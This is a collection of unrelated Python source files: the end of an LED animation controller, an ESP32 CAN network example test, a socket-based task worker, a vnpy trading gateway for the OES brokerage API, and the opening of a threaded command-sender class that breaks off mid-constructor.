[(c[0][0] % 1, c[0][1], c[0][2] * c[1]) for c in s_2],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
elif mode == animpatterns.ColorMode.rgb:
self.led_controller.set_all_pixels_rgb_float(
[(c[0][0] * c[1], c[0][1] * c[1], c[0][2] * c[1]) for c in s_2],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
            # No update is needed next frame if the primary pattern is static (or its
            # speed is 0) and there is no secondary pattern, or if the brightness is 0
            self.update_needed = not (
                ((self.params['primary_pattern'] in animpatterns.static_patterns or self.params['primary_speed'] == 0) and self.params['secondary_pattern'] == 0) or self.params['brightness'] == 0)
def clear_leds(self):
'Turn all LEDs off'
self.led_controller.set_all_pixels_rgb_float(
[(0, 0, 0) for i in range(self.led_count)],
self.correction,
self.params['saturation'],
self.params['brightness'],
self.params['gamma']
)
def end_animation(self):
'Stop rendering in the animation thread'
self.timer.stop()
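# Usage sketch (hedged): the class name and constructor arguments are defined earlier in
# this file and are not shown here, so the instantiation below is hypothetical; only the
# methods visible above are referenced.
#
#   controller = LEDAnimationController(...)      # hypothetical name and arguments
#   controller.begin_animation_thread()           # render at refresh_rate via RepeatedTimer
#   controller.set_param('primary_speed', 0.5)    # marks update_needed; recalcs run as needed
#   controller.end_animation()                    # stop the timer
#   controller.clear_leds()                       # blank the strip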
|
example_test.py
|
# Need Python 3 string formatting functions
from __future__ import print_function
from threading import Thread
import ttfw_idf
# Define tuple of strings to expect for each DUT.
master_expect = ("CAN Master: Driver installed", "CAN Master: Driver uninstalled")
slave_expect = ("CAN Slave: Driver installed", "CAN Slave: Driver uninstalled")
listen_only_expect = ("CAN Listen Only: Driver installed", "CAN Listen Only: Driver uninstalled")
def dut_thread_callback(**kwargs):
# Parse keyword arguments
dut = kwargs['dut'] # Get DUT from kwargs
expected = kwargs['expected']
result = kwargs['result'] # Get result[out] from kwargs. MUST be of mutable type e.g. list
# Must reset again as flashing during start_app will reset multiple times, causing unexpected results
dut.reset()
for string in expected:
dut.expect(string, 20)
# Mark thread has run to completion without any exceptions
result[0] = True
@ttfw_idf.idf_example_test(env_tag='Example_CAN2')
def test_can_network_example(env, extra_data):
# Get device under test. "dut1", "dut2", and "dut3" must be properly defined in EnvConfig
dut_master = env.get_dut("dut1", "examples/peripherals/can/can_network/can_network_master",
dut_class=ttfw_idf.ESP32DUT)
dut_slave = env.get_dut("dut2", "examples/peripherals/can/can_network/can_network_slave",
dut_class=ttfw_idf.ESP32DUT)
dut_listen_only = env.get_dut("dut3", "examples/peripherals/can/can_network/can_network_listen_only",
dut_class=ttfw_idf.ESP32DUT)
# Flash app onto each DUT, each DUT is reset again at the start of each thread
dut_master.start_app()
dut_slave.start_app()
dut_listen_only.start_app()
# Create dict of keyword arguments for each dut
results = [[False], [False], [False]]
master_kwargs = {"dut": dut_master, "result": results[0], "expected": master_expect}
slave_kwargs = {"dut": dut_slave, "result": results[1], "expected": slave_expect}
listen_only_kwargs = {"dut": dut_listen_only, "result": results[2], "expected": listen_only_expect}
# Create thread for each dut
dut_master_thread = Thread(target=dut_thread_callback, name="Master Thread", kwargs=master_kwargs)
dut_slave_thread = Thread(target=dut_thread_callback, name="Slave Thread", kwargs=slave_kwargs)
dut_listen_only_thread = Thread(target=dut_thread_callback, name="Listen Only Thread", kwargs=listen_only_kwargs)
# Start each thread
dut_listen_only_thread.start()
dut_master_thread.start()
dut_slave_thread.start()
# Wait for threads to complete
dut_listen_only_thread.join()
dut_master_thread.join()
dut_slave_thread.join()
# check each thread ran to completion
for result in results:
if result[0] is not True:
raise Exception("One or more threads did not run successfully")
if __name__ == '__main__':
test_can_network_example()
|
worker.py
|
import json
import socket
import time
import sys
import random
import numpy as np
import threading
from datetime import datetime
port_no=int(sys.argv[1])
worker_id=sys.argv[2]
class worker:
def __init__(self):
self.req()
    ''' Decrements the task duration once per second until it reaches 0 (i.e. executes the task), then sends an update message to the master at port 5001 '''
def run1(self,task):
duration=task[2]
while(duration):
duration-=1
time.sleep(1)
res=socket.socket()
res.connect(("localhost",5001))
s=','.join(str(i) for i in task)
print("sending message task completed",task[1])
with open("logs_worker_"+str(task[5])+'_'+str(task[7])+".txt",'a') as f:
f.write(str(task[0])+","+str(task[1])+",task_end,"+str(datetime.now())+"\n")
res.send(s.encode())
    ''' Receives a task execution message from the master on the port given as a command line argument, and spawns a thread running run1 to execute the task '''
def req(self):
req=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
req.bind(("localhost",port_no))
req.listen(12)
while(True):
conn2, addr2 = req.accept()
task=conn2.recv(1024).decode()
task=task.split(',')
task[2]=int(task[2])
task[4]=int(task[4])
task[5]=int(task[5])
task[6]=int(task[6])
print("Got the request to execute task",task[1])
with open("logs_worker_"+str(task[5])+'_'+str(task[7])+".txt",'a') as f:
f.write(str(task[0])+","+str(task[1])+",task_start,"+str(datetime.now())+"\n")
            thread = threading.Thread(target=self.run1, args=[task])
thread.start()
st=worker()
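# Master-side sketch (hedged): the worker expects one comma-separated string per
# connection with at least 8 fields. Only the indices used above are known: [1] task id
# (printed and logged), [2] duration in seconds, [5] and [7] log file suffixes, [6] thread
# suffix; the remaining fields are assumptions. Because st=worker() blocks in the accept
# loop, the snippet below is illustrative only.
#
#   import socket
#   s = socket.socket()
#   s.connect(("localhost", 6000))              # port this worker was started with (argv[1])
#   s.send("j1,task_A,5,x,0,1,0,0".encode())    # illustrative field values
#   s.close()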
|
oes_td.py
|
import time
from copy import copy
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from gettext import gettext as _
from threading import Lock, Thread
# noinspection PyUnresolvedReferences
from typing import Any, Callable, Dict
from vnpy.api.oes.vnoes import OesApiClientEnvT, OesApiSubscribeInfoT, OesApi_DestoryAll, \
OesApi_InitLogger, OesApi_InitOrdChannel2, OesApi_InitQryChannel2, OesApi_InitRptChannel2, \
OesApi_LogoutAll, OesApi_QueryCashAsset, \
OesApi_QueryOptHolding, OesApi_QueryOption, OesApi_QueryOrder, OesApi_QueryStkHolding, \
OesApi_QueryStock, OesApi_SendOrderCancelReq, OesApi_SendOrderReq, OesApi_SetCustomizedDriverId, \
OesApi_SetThreadPassword, OesApi_SetThreadUsername, OesApi_WaitReportMsg, OesOrdCancelReqT, \
OesOrdCnfmT, OesOrdRejectT, OesOrdReqT, OesQryCashAssetFilterT, OesQryCursorT, \
OesQryOptionFilterT, OesQryOrdFilterT, OesQryStkHoldingFilterT, OesQryStockFilterT, \
OesRspMsgBodyT, OesStockBaseInfoT, OesTrdCnfmT, SGeneralClientChannelT, SMSG_PROTO_BINARY, \
SMsgHeadT, cast, eOesBuySellTypeT, eOesMarketIdT, eOesMsgTypeT, \
eOesOrdStatusT, eOesOrdTypeShT, eOesOrdTypeSzT, eOesSubscribeReportTypeT
from vnpy.gateway.oes.error_code import error_to_str
from vnpy.gateway.oes.utils import create_remote_config, is_disconnected
from vnpy.trader.constant import Direction, Exchange, Offset, OrderType, Product, Status
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import AccountData, CancelRequest, ContractData, OrderData, OrderRequest, \
PositionData, TradeData
EXCHANGE_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Exchange.SSE,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Exchange.SZSE,
eOesMarketIdT.OES_MKT_SH_OPTION: Exchange.SHFE,
}
EXCHANGE_VT2OES = {v: k for k, v in EXCHANGE_OES2VT.items()}
PRODUCT_OES2VT = {
eOesMarketIdT.OES_MKT_SH_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SZ_ASHARE: Product.EQUITY,
eOesMarketIdT.OES_MKT_SH_OPTION: Product.FUTURES,
}
# Only LIMIT orders map one-to-one; other order/price types have no exact OES equivalent.
ORDER_TYPE_VT2OES = {
(Exchange.SSE, OrderType.LIMIT): eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT,
(Exchange.SZSE, OrderType.LIMIT): eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT,
}
ORDER_TYPE_OES2VT = {
(eOesMarketIdT.OES_MKT_SH_ASHARE, eOesOrdTypeShT.OES_ORD_TYPE_SH_LMT): OrderType.LIMIT,
(eOesMarketIdT.OES_MKT_SZ_ASHARE, eOesOrdTypeSzT.OES_ORD_TYPE_SZ_LMT): OrderType.LIMIT,
}
BUY_SELL_TYPE_VT2OES = {
(Exchange.SSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SZSE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_BUY,
(Exchange.SZSE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_SELL,
(Exchange.SHFE, Offset.OPEN, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_OPEN,
(Exchange.SHFE, Offset.OPEN, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_OPEN,
(Exchange.SHFE, Offset.CLOSE, Direction.LONG): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.SHORT): eOesBuySellTypeT.OES_BS_TYPE_SELL_CLOSE,
(Exchange.SHFE, Offset.CLOSE, Direction.NET): eOesBuySellTypeT.OES_BS_TYPE_BUY_CLOSE,
}
STATUS_OES2VT = {
eOesOrdStatusT.OES_ORD_STATUS_NEW: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_DECLARED: Status.NOTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_FILLED: Status.PARTTRADED,
eOesOrdStatusT.OES_ORD_STATUS_FILLED: Status.ALLTRADED,
eOesOrdStatusT.OES_ORD_STATUS_CANCEL_DONE: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_PARTIALLY_CANCELED: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_CANCELED: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_OES: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_COMM: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_REJECT: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_TRY_AGAIN: Status.REJECTED,
}
bjtz = timezone(timedelta(hours=8))
@dataclass
class InternalOrder:
order_id: int = None
vt_order: OrderData = None
def parse_oes_datetime(date: int, time: int):
"""convert oes datetime to python datetime"""
# YYYYMMDD
year = int(date / 10000)
month = int((date % 10000) / 100)
day = int(date % 100)
# HHMMSSsss
hour = int(time / 10000000)
minute = int((time % 10000000) / 100000)
sec = int((time % 100000) / 1000)
mill = int(time % 1000)
return datetime(year, month, day, hour, minute, sec, mill * 1000, tzinfo=bjtz)
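# Worked example: parse_oes_datetime(20190315, 93005123)
#   date 20190315 (YYYYMMDD) -> year 2019, month 3, day 15
#   time 93005123 (HHMMSSsss) -> 09:30:05.123
#   => datetime(2019, 3, 15, 9, 30, 5, 123000, tzinfo=bjtz)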
class OesTdMessageLoop:
def __init__(self,
gateway: BaseGateway,
env: OesApiClientEnvT,
td: "OesTdApi",
order_manager: "OrderManager",
):
""""""
self.gateway = gateway
self._env = env
self._td = td
self._order_manager = order_manager
self._alive = False
self._th = Thread(target=self._message_loop)
self.message_handlers: Dict[eOesMsgTypeT, Callable[[OesRspMsgBodyT], int]] = {
eOesMsgTypeT.OESMSG_RPT_BUSINESS_REJECT: self.on_order_rejected,
eOesMsgTypeT.OESMSG_RPT_ORDER_INSERT: self.on_order_inserted,
eOesMsgTypeT.OESMSG_RPT_ORDER_REPORT: self.on_order_report,
eOesMsgTypeT.OESMSG_RPT_TRADE_REPORT: self.on_trade_report,
eOesMsgTypeT.OESMSG_RPT_STOCK_HOLDING_VARIATION: self.on_stock_holding,
eOesMsgTypeT.OESMSG_RPT_OPTION_HOLDING_VARIATION: self.on_option_holding,
eOesMsgTypeT.OESMSG_RPT_CASH_ASSET_VARIATION: self.on_cash,
eOesMsgTypeT.OESMSG_RPT_REPORT_SYNCHRONIZATION: lambda x: 1,
eOesMsgTypeT.OESMSG_SESS_HEARTBEAT: lambda x: 1,
}
def start(self):
""""""
if not self._alive: # not thread-safe
self._alive = True
self._th.start()
def stop(self):
""""""
self._alive = False
def join(self):
""""""
self._th.join()
def reconnect(self):
""""""
        self.gateway.write_log(_("Attempting to reconnect to the trading server."))
        return self._td.connect_rpt_channel()
def _on_message(self, session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any):
""""""
if session_info.protocolType == SMSG_PROTO_BINARY:
b = cast.toOesRspMsgBodyT(body)
if head.msgId in self.message_handlers:
self.message_handlers[head.msgId](b)
else:
self.gateway.write_log(
f"unknown msg id : {head.msgId} {eOesMsgTypeT(head.msgId)}")
else:
self.gateway.write_log(f"unknown prototype : {session_info.protocolType}")
return 1
def _message_loop(self):
""""""
rpt_channel = self._env.rptChannel
timeout_ms = 1000
while self._alive:
ret = OesApi_WaitReportMsg(rpt_channel,
timeout_ms,
self._on_message)
if ret < 0:
# if is_timeout(ret):
# pass # just no message
if is_disconnected(ret):
                    self.gateway.write_log(_("Connection to the trading server has been lost."))
while self._alive and not self.reconnect():
pass
return
def on_order_rejected(self, d: OesRspMsgBodyT):
""""""
error_code = d.rptMsg.rptHead.ordRejReason
error_string = error_to_str(error_code)
data: OesOrdRejectT = d.rptMsg.rptBody.ordRejectRsp
if not data.origClSeqNo:
try:
i = self._order_manager.get_order(data.clSeqNo)
except KeyError:
return # rejected order created by others, don't need to care.
vt_order = i.vt_order
            if vt_order.status == Status.ALLTRADED:
return
vt_order.status = Status.REJECTED
self.gateway.on_order(copy(vt_order))
self.gateway.write_log(
f"Order: {vt_order.vt_symbol}-{vt_order.vt_orderid} Code: {error_code} Rejected: {error_string}")
else:
            self.gateway.write_log(f"Cancel failed for order {data.origClSeqNo}. Reason: {error_string}")
def on_order_inserted(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.ordInsertRsp
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_order_report(self, d: OesRspMsgBodyT):
""""""
data: OesOrdCnfmT = d.rptMsg.rptBody.ordCnfm
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_trade_report(self, d: OesRspMsgBodyT):
""""""
data: OesTrdCnfmT = d.rptMsg.rptBody.trdCnfm
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
trade = TradeData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(data.clSeqNo),
tradeid=str(data.exchTrdNum),
direction=vt_order.direction,
offset=vt_order.offset,
price=data.trdPrice / 10000,
volume=data.trdQty,
time=parse_oes_datetime(data.trdDate, data.trdTime).isoformat()
)
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.traded = data.cumQty
        vt_order.time = parse_oes_datetime(data.trdDate, data.trdTime).isoformat()
self.gateway.on_trade(trade)
self.gateway.on_order(copy(vt_order))
def on_option_holding(self, d: OesRspMsgBodyT):
""""""
pass
def on_stock_holding(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.stkHoldingRpt
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
def on_cash(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.cashAssetRpt
balance = data.currentTotalBal
        available = data.currentAvailableBal
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
            frozen=balance - available,
)
self.gateway.on_account(account)
return 1
class OesTdApi:
def __init__(self, gateway: BaseGateway):
""""""
self.config_path: str = ''
self.ord_server: str = ''
self.qry_server: str = ''
self.rpt_server: str = ''
self.username: str = ''
self.password: str = ''
self.hdd_serial: str = ''
self.gateway = gateway
self._env = OesApiClientEnvT()
self._order_manager: "OrderManager" = OrderManager(self.gateway.gateway_name)
self._message_loop = OesTdMessageLoop(gateway,
self._env,
self,
self._order_manager
)
self._last_seq_lock = Lock()
        self._last_seq_index = 1000000  # 0 has special meaning for oes
self._ord_reconnect_lock = Lock()
def connect(self):
"""Connect to trading server.
:note set config_path before calling this function
"""
OesApi_InitLogger(self.config_path, 'log')
OesApi_SetCustomizedDriverId(self.hdd_serial)
        if not self._connect_ord_channel():
            self.gateway.write_log(_("Failed to initialize the order channel (td_ord_server)"))
        if not self._connect_qry_channel():
            self.gateway.write_log(_("Failed to initialize the query channel (td_qry_server)"))
        if not self.connect_rpt_channel():
            self.gateway.write_log(_("Failed to initialize the report channel (td_rpt_server)"))
return True
def start(self):
""""""
self._message_loop.start()
def stop(self):
""""""
self._message_loop.stop()
OesApi_LogoutAll(self._env, True)
OesApi_DestoryAll(self._env)
def join(self):
""""""
self._message_loop.join()
def _get_new_seq_index(self):
""""""
with self._last_seq_lock:
index = self._last_seq_index
self._last_seq_index += 1
return index
def _connect_qry_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
return OesApi_InitQryChannel2(self._env.qryChannel,
create_remote_config(self.qry_server,
self.username,
self.password))
def _connect_ord_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
if not OesApi_InitOrdChannel2(self._env.ordChannel,
create_remote_config(self.ord_server,
self.username,
self.password),
0):
return False
self._last_seq_index = max(self._last_seq_index, self._env.ordChannel.lastOutMsgSeq + 1)
return True
def connect_rpt_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
subscribe_info = OesApiSubscribeInfoT()
subscribe_info.clEnvId = 0
subscribe_info.rptTypes = (eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_BUSINESS_REJECT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_INSERT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_TRADE_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_FUND_TRSF_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_CASH_ASSET_VARIATION
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_HOLDING_VARIATION
)
return OesApi_InitRptChannel2(self._env.rptChannel,
create_remote_config(self.rpt_server,
self.username,
self.password),
subscribe_info,
0)
def _reconnect_ord_channel(self):
with self._ord_reconnect_lock: # prevent spawning multiple reconnect thread
            self.gateway.write_log(_("Reconnecting to the order channel"))
while not self._connect_ord_channel():
time.sleep(1)
            self.gateway.write_log(_("Successfully reconnected to the order channel"))
def _schedule_reconnect_ord_channel(self):
Thread(target=self._reconnect_ord_channel, ).start()
def query_account(self):
""""""
OesApi_QueryCashAsset(self._env.qryChannel,
OesQryCashAssetFilterT(),
self.on_query_asset
)
def on_query_asset(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesCashAssetItemT(body)
balance = data.currentTotalBal / 10000
        available = data.currentAvailableBal / 10000
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
            frozen=balance - available,
)
self.gateway.on_account(account)
return 1
def query_stock(self, ) -> bool:
""""""
f = OesQryStockFilterT()
ret = OesApi_QueryStock(self._env.qryChannel, f, self.on_query_stock)
return ret >= 0
def on_query_stock(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesStockBaseInfoT = cast.toOesStockItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.buyQtyUnit,
min_volume=100,
net_position=True,
pricetick=data.priceUnit,
)
self.gateway.on_contract(contract)
return 1
def query_option(self) -> bool:
""""""
f = OesQryOptionFilterT()
ret = OesApi_QueryOption(self._env.qryChannel,
f,
self.on_query_option
)
return ret >= 0
def on_query_option(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptionItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.roundLot,
pricetick=data.tickSize,
)
self.gateway.on_contract(contract)
return 1
def query_stock_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
ret = OesApi_QueryStkHolding(self._env.qryChannel,
f,
self.on_query_stock_holding
)
return ret >= 0
def on_query_stock_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesStkHoldingItemT(body)
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
return 1
def query_option_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
f.mktId = eOesMarketIdT.OES_MKT_ID_UNDEFINE
ret = OesApi_QueryOptHolding(self._env.qryChannel,
f,
self.on_query_holding
)
return ret >= 0
def on_query_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptHoldingItemT(body)
        # Rights side (long positions)
pos_long = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.LONG,
volume=data.hldA,
frozen=data.hldRA,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_long)
        # Obligations side (short positions)
pos_short = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.SHORT,
volume=data.hldB,
frozen=data.hldRB,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_short)
return 1
def query_contracts(self):
""""""
self.query_stock()
# self.query_option()
# self.query_issue()
def query_position(self):
""""""
self.query_stock_holding()
self.query_option_holding()
def send_order(self, vt_req: OrderRequest):
""""""
seq_id = self._get_new_seq_index()
order_id = seq_id
oes_req = OesOrdReqT()
oes_req.clSeqNo = seq_id
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.ordType = ORDER_TYPE_VT2OES[(vt_req.exchange, vt_req.type)]
oes_req.bsType = BUY_SELL_TYPE_VT2OES[(vt_req.exchange, vt_req.offset, vt_req.direction)]
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
oes_req.ordQty = int(vt_req.volume)
oes_req.ordPrice = int(vt_req.price * 10000)
oes_req.origClOrdId = order_id
order = vt_req.create_order_data(str(order_id), self.gateway.gateway_name)
order.direction = Direction.NET # fix direction into NET: stock only
self._order_manager.save_order(order_id, order)
ret = OesApi_SendOrderReq(self._env.ordChannel,
oes_req
)
if ret >= 0:
order.status = Status.SUBMITTING
else:
order.status = Status.REJECTED
            self.gateway.write_log(_("Order submission failed"))  # todo: can I stringify error?
if is_disconnected(ret):
                self.gateway.write_log(_("Connection lost while placing the order, attempting to reconnect"))
self._schedule_reconnect_ord_channel()
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, vt_req: CancelRequest):
""""""
seq_id = self._get_new_seq_index()
oes_req = OesOrdCancelReqT()
order_id = int(vt_req.orderid)
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.clSeqNo = seq_id
oes_req.origClSeqNo = order_id
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
ret = OesApi_SendOrderCancelReq(self._env.ordChannel,
oes_req)
if ret < 0:
            self.gateway.write_log(_("Order cancellation failed"))  # todo: can I stringify error?
if is_disconnected(ret): # is here any other ret code indicating connection lost?
                self.gateway.write_log(_("Connection lost while cancelling the order, attempting to reconnect"))
self._schedule_reconnect_ord_channel()
def query_order(self, internal_order: InternalOrder) -> bool:
""""""
f = OesQryOrdFilterT()
f.mktId = EXCHANGE_VT2OES[internal_order.vt_order.exchange]
f.clSeqNo = internal_order.order_id
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_order
)
return ret >= 0
def on_query_order(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
self.gateway.on_order(copy(vt_order))
return 1
def query_orders(self) -> bool:
""""""
f = OesQryOrdFilterT()
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_orders
)
return ret >= 0
def on_query_orders(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(vt_order)
return 1
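# Usage sketch (hedged): placing a limit order through OesTdApi.send_order. The symbol,
# price, and volume are illustrative; OrderRequest comes from vnpy.trader.object as
# imported above, and send_order scales the price by 10000 and forces Direction.NET for
# stocks.
#
#   req = OrderRequest(symbol="600000", exchange=Exchange.SSE, direction=Direction.LONG,
#                      type=OrderType.LIMIT, volume=100, price=10.5, offset=Offset.OPEN)
#   vt_orderid = td_api.send_order(req)   # td_api is a connected OesTdApi instance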
class OrderManager:
def __init__(self, gateway_name: str):
self._orders: Dict[int, InternalOrder] = {}
self.gateway_name = gateway_name
def oes_order_to_vt(self, data):
order_id = data.clSeqNo
if hasattr(data, "origClSeqNo") and data.origClSeqNo:
order_id = data.origClSeqNo
try:
i = self.get_order(order_id)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
vt_order.time = parse_oes_datetime(data.ordDate, data.ordTime).isoformat()
except KeyError:
if data.bsType == eOesBuySellTypeT.OES_BS_TYPE_BUY:
offset = Offset.OPEN
else:
offset = Offset.CLOSE
vt_order = OrderData(
gateway_name=self.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(order_id if order_id else data.origClSeqNo), # generated id
type=ORDER_TYPE_OES2VT[(data.mktId, data.ordType)],
direction=Direction.NET,
offset=offset,
price=data.ordPrice / 10000,
volume=data.ordQty,
traded=data.cumQty,
status=STATUS_OES2VT[
data.ordStatus],
# this time should be generated automatically or by a static function
time=parse_oes_datetime(data.ordDate, data.ordCnfmTime).isoformat(),
)
self.save_order(order_id, vt_order)
return vt_order
def save_order(self, order_id: int, order: OrderData):
""""""
self._orders[order_id] = InternalOrder(
order_id=order_id,
vt_order=order,
)
def get_order(self, order_id: int):
""""""
return self._orders[order_id]
|
parallel_senders.py
|
import threading
import BB
class ParallelSender(object):
'''
    Sends a command and waits for the answer in parallel with other threads' execution,
    allowing other threads to poll whether the response has been received.
    :param Command command: Command to be sent, must be an instance of class Command.
    :param int timeout: (Default 300000) How long (in milliseconds) to wait for a response before trying again or aborting.
    :param int attempts: (Default 1) How many times to send the command if no response is received after timeout.
        If attempts is 0, it will keep trying indefinitely until StopSending is called. (Use carefully)
.. note::
Notice the command is sent when the object is created.
'''
def __init__(self, command, timeout = 300000, attempts = 1):
self._sendingLock = threading.Lock()
self._sending = True
